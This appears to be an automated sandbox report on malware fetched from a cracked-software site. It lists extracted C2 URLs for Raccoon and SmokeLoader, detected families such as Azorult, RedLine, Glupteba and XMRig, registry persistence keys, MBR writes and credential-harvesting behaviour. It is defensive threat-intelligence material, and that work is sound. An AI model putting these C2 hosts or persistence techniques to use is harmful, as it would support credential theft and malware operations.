azorult | hxxps://cracknet[.]net/

Resubmissions

13-02-2021 12:53

210213-nbwz5vbpyn 10

13-02-2021 10:50

210213-pdsnp7g4a2 10

Analysis

max time kernel
200s
max time network
378s
platform
windows10_x64
resource
win10v20201028
submitted
13-02-2021 12:53

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

https://cracknet.net/
Sample

210213-nbwz5vbpyn

Malware Config

Extracted

Family

raccoon

Botnet

8a5ae6012868ca42851ee67a7adea59c46a3fb6d

Attributes

url4cnc
https://telete.in/jdiavolenok23

rc4.plain

Extracted

Family

smokeloader

Version

2020

http://naritouzina.net/

http://nukaraguasleep.net/

http://notfortuaj.net/

http://natuturalistic.net/

http://zaniolofusa.net/

http://4zavr.com/upload/

http://zynds.com/upload/

http://atvua.com/upload/

http://detse.net/upload/

http://dsdett.com/upload/

http://dtabasee.com/upload/

http://yeronogles.monster/upload/

rc4.i32

Extracted

Family

raccoon

Botnet

17694a35d42ac97e2cd3ebd196db01b372cce1b0

Attributes

url4cnc
https://telete.in/o23felk0s

rc4.plain

Extracted

Family

smokeloader

Version

2019

http://10022020newfolder1002002131-service1002.space/

http://10022020newfolder1002002231-service1002.space/

http://10022020newfolder3100231-service1002.space/

http://10022020newfolder1002002431-service1002.space/

http://10022020newfolder1002002531-service1002.space/

http://10022020newfolder33417-01242510022020.space/

http://10022020test125831-service1002012510022020.space/

http://10022020test136831-service1002012510022020.space/

http://10022020test147831-service1002012510022020.space/

http://10022020test146831-service1002012510022020.space/

http://10022020test134831-service1002012510022020.space/

http://10022020est213531-service100201242510022020.ru/

http://10022020yes1t3481-service1002012510022020.ru/

http://10022020test13561-service1002012510022020.su/

http://10022020test14781-service1002012510022020.info/

http://10022020test13461-service1002012510022020.net/

http://10022020test15671-service1002012510022020.tech/

http://10022020test12671-service1002012510022020.online/

http://10022020utest1341-service1002012510022020.ru/

http://10022020uest71-service100201dom2510022020.ru/

rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

raccoon

Botnet

027bc1bb9168079d5f7473eee9c05ee06589c305

Attributes

url4cnc
https://telete.in/jjbadb0y

rc4.plain

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/8724-771-0x0000000001520000-0x0000000001D22000-memory.dmp	family_glupteba
behavioral1/memory/8724-772-0x0000000000400000-0x0000000000C1B000-memory.dmp	family_glupteba
behavioral1/memory/8724-773-0x0000000000400000-0x0000000000C1B000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
PlugX
PlugX is a RAT (Remote Access Trojan) that has been around since 2008.
trojan plugx
Pony,Fareit
Pony is a Remote Access Trojan application that steals information.
rat spyware stealer pony
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/7260-644-0x0000000002290000-0x00000000022BE000-memory.dmp	family_redline
behavioral1/memory/7260-648-0x0000000002500000-0x000000000252C000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

XMRig Miner Payload 1 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/7284-946-0x0000000002D40000-0x0000000002E31000-memory.dmp	xmrig

Creates new service(s) 1 TTPs
persistence

New Service
T1050

Executes dropped EXE 48 IoCs

Processes:

keygen-pr.exekeygen-step-1.exekeygen-step-2.exekeygen-step-3.exekeygen-step-4.exekey.exeSetup.exekey.exeA9E8.tmp.exe6489A2274AE24900.exe6489A2274AE24900.exemd2_2efs.exe1613221200584.exefile.exeE309.tmp.exe1613221205193.exeBTRSetp.exeinstaller.exeE309.tmp.exe5074078.552817902.303445854.371613221211146.exeWindows Host.exegdrrr.exejfiag3g_gg.exejfiag3g_gg.exekeygen-pr.exekeygen-step-1.exekeygen-step-2.exekeygen-step-3.exekeygen-step-4.exekey.exeSetup.exe4695.tmp.exeThunderFW.exemd2_2efs.exekeygen-pr.exekeygen-step-1.exekeygen-step-2.exekeygen-step-3.exekeygen-step-4.exekey.exeSetup.exeMiniThunderPlatform.exefile.exe71AD.tmp.exekeygen-step-2.exe

pid	process
4264	keygen-pr.exe
4576	keygen-step-1.exe
2372	keygen-step-2.exe
836	keygen-step-3.exe
1520	keygen-step-4.exe
4956	key.exe
4816	Setup.exe
224	key.exe
3316	A9E8.tmp.exe
1768	6489A2274AE24900.exe
2948	6489A2274AE24900.exe
1756	md2_2efs.exe
4708	1613221200584.exe
4344	file.exe
4888	E309.tmp.exe
936	1613221205193.exe
4496	BTRSetp.exe
4612	installer.exe
4216	E309.tmp.exe
1636	5074078.55
3680	2817902.30
4332	3445854.37
3824	1613221211146.exe
4068	Windows Host.exe
4672	gdrrr.exe
4552	jfiag3g_gg.exe
1736	jfiag3g_gg.exe
5080	keygen-pr.exe
2884	keygen-step-1.exe
2848	keygen-step-2.exe
4916	keygen-step-3.exe
3340	keygen-step-4.exe
4980	key.exe
2240	Setup.exe
4248	4695.tmp.exe
2452	ThunderFW.exe
4328	md2_2efs.exe
3216	keygen-pr.exe
2436	keygen-step-1.exe
4360	keygen-step-2.exe
5164	keygen-step-3.exe
5308	keygen-step-4.exe
5496	key.exe
5520	Setup.exe
5676	MiniThunderPlatform.exe
5768	file.exe
5848	71AD.tmp.exe
5876	keygen-step-2.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/7948-830-0x0000000004000000-0x0000000004001000-memory.dmp	upx
behavioral1/memory/5736-992-0x0000000000400000-0x00000000047FC000-memory.dmp	upx
behavioral1/memory/5736-1000-0x0000000000400000-0x00000000047FC000-memory.dmp	upx

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral1/memory/8928-1031-0x0000000000180000-0x0000000000B99000-memory.dmp	vmprotect

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

3445854.37

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3445854.37
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3445854.37

Loads dropped DLL 23 IoCs

Processes:

MsiExec.exeA9E8.tmp.exeMsiExec.exe4695.tmp.exe6489A2274AE24900.exeMiniThunderPlatform.exe

pid	process
4600	MsiExec.exe
3316	A9E8.tmp.exe
3316	A9E8.tmp.exe
3316	A9E8.tmp.exe
3316	A9E8.tmp.exe
3316	A9E8.tmp.exe
3316	A9E8.tmp.exe
5008	MsiExec.exe
4248	4695.tmp.exe
4248	4695.tmp.exe
4248	4695.tmp.exe
4248	4695.tmp.exe
4248	4695.tmp.exe
4248	4695.tmp.exe
1768	6489A2274AE24900.exe
1768	6489A2274AE24900.exe
5676	MiniThunderPlatform.exe
5676	MiniThunderPlatform.exe
5676	MiniThunderPlatform.exe
5676	MiniThunderPlatform.exe
5676	MiniThunderPlatform.exe
5676	MiniThunderPlatform.exe
5676	MiniThunderPlatform.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

6416 icacls.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
6416	icacls.exe

themida 9 IoCs

Detects Themida, Advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral1/memory/4332-365-0x0000000000170000-0x0000000000171000-memory.dmp	themida
behavioral1/memory/6268-478-0x0000000001040000-0x0000000001041000-memory.dmp	themida
behavioral1/memory/7280-602-0x00000000003C0000-0x00000000003C1000-memory.dmp	themida
behavioral1/memory/4580-710-0x0000000000FF0000-0x0000000000FF1000-memory.dmp	themida
behavioral1/memory/8672-755-0x0000000000FD0000-0x0000000000FD1000-memory.dmp	themida
behavioral1/memory/8344-806-0x0000000000C80000-0x0000000000C81000-memory.dmp	themida
behavioral1/memory/7816-959-0x0000000000DD0000-0x0000000000DD1000-memory.dmp	themida
behavioral1/memory/4704-987-0x0000000000BB0000-0x0000000000BB1000-memory.dmp	themida
behavioral1/memory/8928-1031-0x0000000000180000-0x0000000000B99000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

gdrrr.exe2817902.30

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	gdrrr.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe"	2817902.30

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 8 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

Setup.exe6489A2274AE24900.exe6489A2274AE24900.exemd2_2efs.exe3445854.37Setup.exemd2_2efs.exeSetup.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Setup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6489A2274AE24900.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6489A2274AE24900.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md2_2efs.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	3445854.37
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Setup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md2_2efs.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Setup.exe

Drops Chrome extension 1 IoCs

Processes:

6489A2274AE24900.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\mobjnlkohipjcfcklielmmlilnolhlef\1.0.0.0_0\manifest.json	6489A2274AE24900.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exemsiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

354 api.2ip.ua
357 api.2ip.ua
145 api.ipify.org
155 ip-api.com
313 api.ipify.org
460 api.ipify.org
281 api.ipify.org
400 api.ipify.org
448 api.2ip.ua

flow	ioc
354	api.2ip.ua
357	api.2ip.ua
145	api.ipify.org
155	ip-api.com
313	api.ipify.org
460	api.ipify.org
281	api.ipify.org
400	api.ipify.org
448	api.2ip.ua

Writes to the Master Boot Record (MBR) 1 TTPs 6 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1067

Processes:

Setup.exeMiniThunderPlatform.exeSetup.exeSetup.exe6489A2274AE24900.exe6489A2274AE24900.exe

description	ioc	process
File opened for modification	\??\PhysicalDrive0	Setup.exe
File opened for modification	\??\PhysicalDrive0	MiniThunderPlatform.exe
File opened for modification	\??\PhysicalDrive0	Setup.exe
File opened for modification	\??\PhysicalDrive0	Setup.exe
File opened for modification	\??\PhysicalDrive0	6489A2274AE24900.exe
File opened for modification	\??\PhysicalDrive0	6489A2274AE24900.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

Setup.exe3445854.37Setup.exe

pid process

4816 Setup.exe
4332 3445854.37
2240 Setup.exe

pid	process
4816	Setup.exe
4332	3445854.37
2240	Setup.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

key.exe6489A2274AE24900.exeE309.tmp.exekeygen-step-2.exe

description	pid	process	target process
PID 4956 set thread context of 224	4956	key.exe	key.exe
PID 1768 set thread context of 1868	1768	6489A2274AE24900.exe	firefox.exe
PID 1768 set thread context of 4444	1768	6489A2274AE24900.exe	firefox.exe
PID 4888 set thread context of 4216	4888	E309.tmp.exe	E309.tmp.exe
PID 1768 set thread context of 2452	1768	6489A2274AE24900.exe	firefox.exe
PID 4360 set thread context of 5876	4360	keygen-step-2.exe	keygen-step-2.exe

Drops file in Program Files directory 3 IoCs

Processes:

msiexec.exe

description	ioc	process
File created	C:\Program Files (x86)\gdiview\gdiview\readme.txt	msiexec.exe
File created	C:\Program Files (x86)\gdiview\gdiview\GDIView.chm	msiexec.exe
File created	C:\Program Files (x86)\gdiview\gdiview\GDIView.exe	msiexec.exe

Drops file in Windows directory 9 IoCs

Processes:

msiexec.exeWerFault.exe

description	ioc	process
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{9A2A452C-3057-4F5E-8C7F-41B0D566B831}	msiexec.exe
File created	C:\Windows\Installer\f7758c8.msi	msiexec.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe
File created	C:\Windows\Installer\f7758c6.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\f7758c6.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5CEC.tmp	msiexec.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.

Program crash 15 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1584	1756	WerFault.exe	md2_2efs.exe
4768	1636	WerFault.exe	5074078.55
4192	4328	WerFault.exe	md2_2efs.exe
6216	1228	WerFault.exe	999166.10
5616	1244	WerFault.exe	md2_2efs.exe
5384	6244	WerFault.exe	md2_2efs.exe
5564	7056	WerFault.exe	md2_2efs.exe
7480	5568	WerFault.exe	md2_2efs.exe
4592	7680	WerFault.exe	md2_2efs.exe
7248	188	WerFault.exe	7154320.78
7776	6524	WerFault.exe	6137021.67
5516	7860	WerFault.exe	3933288.43
7948	7584	WerFault.exe	9090.exe
5404	4212	WerFault.exe	md2_2efs.exe
5412	8404	WerFault.exe	5624724.61

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

6489A2274AE24900.exe6489A2274AE24900.exesvchost.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	6489A2274AE24900.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	6489A2274AE24900.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	6489A2274AE24900.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	6489A2274AE24900.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Capabilities	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	6489A2274AE24900.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	6489A2274AE24900.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Capabilities	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Mfg	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	6489A2274AE24900.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	6489A2274AE24900.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	6489A2274AE24900.exe
